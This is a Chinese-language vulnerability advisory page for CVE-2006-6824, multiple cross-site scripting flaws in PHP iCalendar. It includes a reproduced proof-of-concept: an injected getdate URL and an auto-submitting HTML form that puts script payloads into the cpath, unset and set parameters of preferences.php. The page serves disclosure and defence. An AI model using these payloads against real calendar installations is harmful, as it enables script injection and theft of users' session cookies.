Jim Hu和Chad Little PHP iCalendar多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111879 漏洞类型 跨站脚本
发布时间 2006-12-27 更新时间 2007-01-10
CVE编号 CVE-2006-6824 CNNVD-ID CNNVD-200612-602
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/29370
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-602
|漏洞详情
JimHu和ChadLittlePHPiCalendar存在多个跨站脚本攻击(XSS)漏洞,远程攻击者可以通过在(a)day.php,(b)month.php,(c)year.php,(d)week.php,(e)search.php,(f)rss/index.php,(g)print.php和(h)preferences.php中的(1)getdate参数;在(i)day.php,(j)month.php,(k)year.php,(l)week.php和(m)search.php中的(2)cpath参数;在search.php中的(3)query参数;及可能的在preferences.php中setcookie操作内的cpath,(4)unset和(5)set参数;来注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/21792/info
       
PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 
       
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
       
http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work &getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E <html> <head></head> <body> <title>PHP icalendar XSS in preferences.php PoC</title> <p><a href="http://phpicalendar.net/" target="_BLANK">PHP icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p> <p>Modify the target host , by default http://localhost/</P> <br /><br /><form method='post' action='

http://localhost/phpicalendar/preferences.php?action=setcookie'> cookie_language: <input input='text' value='Spanish' name='cookie_language' style='width: 80%' /><br> cookie_calendar: <input input='text' value='all_calendars_combined971' name='cookie_calendar' style='width: 80%' /><br> cpath: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='cpath' style='width: 80%' /><br> cookie_view: <input input='text' value='day' name='cookie_view' style='width: 80%' /><br> cookie_time: <input input='text' value='0700' name='cookie_time' style='width: 80%' /><br> cookie_startday: <input input='text' value='Sunday' name='cookie_startday' style='width: 80%' /><br> cookie_style: <input input='text' value='default' name='cookie_style' style='width: 80%' /><br> unset: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='unset' style='width: 80%' /><br> set: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='set' style='width: 80%' /><br> <input type='submit' value='submit' /><br> </form><hr /> <textarea style='width: 80%; height: 50%;'> <form method='post' action='

http://localhost/phpicalendar/preferences.php?action=setcookie'> cookie_language: <input input='text' value='Spanish' name='cookie_language' style='width: 80%' /><br> cookie_calendar: <input input='text' value='all_calendars_combined971' name='cookie_calendar' style='width: 80%' /><br> cpath: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='cpath' style='width: 80%' /><br> cookie_view: <input input='text' value='day' name='cookie_view' style='width: 80%' /><br> cookie_time: <input input='text' value='0700' name='cookie_time' style='width: 80%' /><br> cookie_startday: <input input='text' value='Sunday' name='cookie_startday' style='width: 80%' /><br> cookie_style: <input input='text' value='default' name='cookie_style' style='width: 80%' /><br> unset: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='unset' style='width: 80%' /><br> set: <input input='text' value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>' name='set' style='width: 80%' /><br> <input type='submit' value='submit' /><br> </form> <script> document.forms[0].submit() </script> </textarea> </body> </html>
|参考资料

来源:XF
名称:phpicalendar-multiple-scripts-xss(31146)
链接:http://xforce.iss.net/xforce/xfdb/31146
来源:BID
名称:21792
链接:http://www.securityfocus.com/bid/21792
来源:BUGTRAQ
名称:20071220PHPiCalendar<=2.24-Cross-SiteScriptingVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/485397/100/200/threaded
来源:OSVDB
名称:32500
链接:http://www.osvdb.org/32500
来源:OSVDB
名称:32499
链接:http://www.osvdb.org/32499
来源:OSVDB
名称:32498
链接:http://www.osvdb.org/32498
来源:OSVDB
名称:32497
链接:http://www.osvdb.org/32497
来源:OSVDB
名称:32496
链接:http://www.osvdb.org/32496
来源:OSVDB
名称:32495
链接:http://www.osvdb.org/32495
来源:OSVDB
名称:32494
链接:http://www.osvdb.org/32494
来源:OSVDB
名称:32493
链接:http://www.osvdb.org/32493
来源:SECTRACK
名称:1017449
链接:http://securitytracker.com/id?1017449
来源:SECUNIA
名称:23499
链接:http://secunia.com/advisories/23499
来源:MISC
链接:http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.html